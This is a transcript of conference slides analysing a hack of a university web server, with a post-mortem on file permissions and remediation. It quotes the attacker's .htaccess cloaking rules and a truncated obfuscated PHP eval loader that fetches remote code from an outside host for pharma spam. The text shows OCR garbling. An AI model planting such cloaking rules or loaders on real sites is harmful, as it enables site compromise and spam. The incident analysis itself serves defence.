Anatomy of a Web Server Hack and Pharma Spam Attack
•
0 j'aime•959 vues
Presentation by Patrick Laverty at BeaCon 2013
Recommandé
Recommandé
Contenu connexe
Tendances
Tendances (18)
Similaire à Anatomy of a Web Server Hack and Pharma Spam Attack
Similaire à Anatomy of a Web Server Hack and Pharma Spam Attack (20)
Dernier
Dernier (20)
Anatomy of a Web Server Hack and Pharma Spam Attack
- 1. Anatomy of a Web Server Hack (it wasn’t fun or profitable) (for me) Patrick Laverty Brown University OWASP Rhode Island BSides Rhode Island TwiGer: @ProvWebAppSec 1
- 2. Who Am I? • Programmer/WebSec guy at Brown University • PaulDotCom Intern • hGp://www.securitybsides.com/BSidesRI • OWASP Rhode Island 2
- 3. What Happened? • We got DoS’d 3
- 4. What Happened? • We got DoS’d • (UnintenSonally) By 4
- 5. Step Back -‐ Timeline • Holiday weekend, 1 dept site down • Reports pharmaspam in Google results 5
- 6. Step Back -‐ Timeline • Holiday weekend, 1 dept site down • Reports pharmaspam in Google results • 7 pm, database server maxed out • Kill processes, they come back • Renaming databases, sites down 6
- 7. Step Back -‐ Timeline • Holiday weekend, 1 dept site down • Reports pharmaspam in Google results • 7 pm, database server maxed out • Kill processes, they come back • Renaming databases, sites down • But most importantly… 7
- 8. Step Back -‐ Timeline 8 Protect www.brown.edu
- 9. Why Did It Happen? • We’re a University • Open and easy • Security is a hassle 9
- 10. OK, Really Why? • One word: FilePermissions 10
- 11. OK, Really Why? • Two words: File Permissions 11
- 12. OK, Really Why? • Two words: File Permissions • >1200 accounts • 600 GB of files • Hundreds of sites 12
- 13. OK, Really Why? • Two words: File Permissions • More history: – Solaris Web Server – 16 groups per user max – Web server user – Thousands of groups on server – World Readable 13
- 14. OK, Really Why? • rwxrwxr-‐x • Security Problem? 14
- 15. OK, Really Why? • rwxrwxr-‐x • Security Problem? • Config files & db connecSon scripts • mysql_connect(db,user,password); • Policy: No sensiSve info 15
- 16. OK, Really Why? • Upgraded to Red Hat Linux • No limit to groups • Put server in every group • Removed world read: ie. rwxrwx-‐-‐-‐ 16
- 17. OK, Really Why? • Everything is writeable! 17
- 18. OK, Really Why? • Everything is writeable! • Whoops 18
- 19. Discovery 19
- 21. Discovery 21
- 22. What Can That Do? • Add New Files • Edit Current Files • Find Places to Hide Files • Change Timestamps 22
- 23. What DID It Do? • Add New Files • Edit Current Files • Find Places to Hide Files • Change Timestamps • Examples? 23
- 24. Stupid .htaccess Tricks I RemoveHandler .html .htm AddType applicaSon/x-‐hGpd-‐php .php .htm .html 24
- 25. Stupid .htaccess Tricks II <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR] RewriteCond %{HTTP_REFERER} (google|aol|yahoo) RewriteBase / RewriteCond %{THE_REQUEST} / RewriteCond %{REQUEST_URI} !/stats.php RewriteRule .+ stats.php [L] </IfModule> 25
- 26. Stupid .htaccess Tricks II <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR] RewriteCond %{HTTP_REFERER} (google|aol|yahoo) RewriteBase / RewriteCond %{THE_REQUEST} / RewriteCond %{REQUEST_URI} !/stats.php RewriteRule .+ stats.php [L] </IfModule> 26
- 27. Weird Google Results 27
- 28. Two Views • Browser: normal • Google, Yahoo, other search spiders? 28
- 29. Look Familiar? <?php //Packed MySQL query core $a4f12b6950e98b=str_rot13('tmhapbzcerff'); $a4f12b6950e98f=str_rot13(strrev('rqbprq_46rfno')); eval($a4f12b6950e98b($a4f12b6950e98f('eF6NVGu2k AQ/ ZU8VCKRqgrbJZFV5YGoxQilVLitvd6qinyBILApCiHBfH13z SAktkoL7OGOXM7uzO7H4LbHzf9259/ OndO1+85zlX38uqu8/e6… 29
- 30. De-‐obfuscated max_execuSon_Sme set_Sme_limit hGp://files-‐uploader.com/7291-‐bred/ … REMOTE_ADDR QUERY_STRING SERVER_SIGNATURE REQUEST_URI REMOTE_ADDR … allow_url_fopen curl_init viagra cialis 30
- 31. Uh-‐Oh max_execuSon_Sme set_Sme_limit hGp://files-‐uploader.com/7291-‐bred/ … REMOTE_ADDR QUERY_STRING SERVER_SIGNATURE REQUEST_URI REMOTE_ADDR … allow_url_fopen curl_init viagra cialis 31
- 32. Uh-‐Oh max_execuSon_Sme set_Sme_limit hGp://files-‐uploader.com/7291-‐bred/ … REMOTE_ADDR QUERY_STRING SERVER_SIGNATURE REQUEST_URI REMOTE_ADDR … allow_url_fopen curl_init viagra cialis 32
- 33. What’s There? 33
- 34. What Are Those? 34
- 35. Why the DoS? max_execuSon_Sme set_Sme_limit hGp://files-‐uploader.com/7291-‐bred/ … REMOTE_ADDR QUERY_STRING SERVER_SIGNATURE REQUEST_URI REMOTE_ADDR … allow_url_fopen curl_init viagra cialis 35
- 36. Why the DoS? What Happens? • Google as Referrer -‐> hit page in .htaccess • Page pulls in code from files-‐uploader.com • Shows page selling Viagra • Brown University = Online Pharmacy • Plus, high Google ranking 36
- 37. How Do You Find It? 37
- 38. How’d We Fix It? Immediate Steps – Deleted the current offending uploader script & redirecSng .htaccess files – Traffic dropped off immediately 38
- 39. How’d We Fix It? Ongoing Steps – Remove all shell files – Remove all uploader files – Find and fix the .htaccess files – Remove the web server user as much as possible – Weakened the shell files – Set up shell file password search in logs – Monthly meeSngs to review 39
- 40. How Else is it Being Fixed? • One Word… • FilePermissions! 40
- 41. How Else is it Being Fixed? • One Word… • FilePermissions! • Three OpSons for Site Owners 41
- 42. OpSon 1 • One web editor? • rwxr-‐x-‐-‐-‐ • Web server user in the group 42
- 43. OpSon 2 • MulSple web editors • rwxrwxr-‐x • Web server user NOT in the group • Back to original security problem 43
- 44. OpSon 3 • Virtual Machine • Do whatever you want! 44
- 45. BoGom Line • Keep file permissions Sght • Keep so‚ware current • Keep users off server 45
- 46. QuesSons? Contact Info: Patrick Laverty Brown University Patrick@brown.edu @provwebappsec or @BSidesRI 46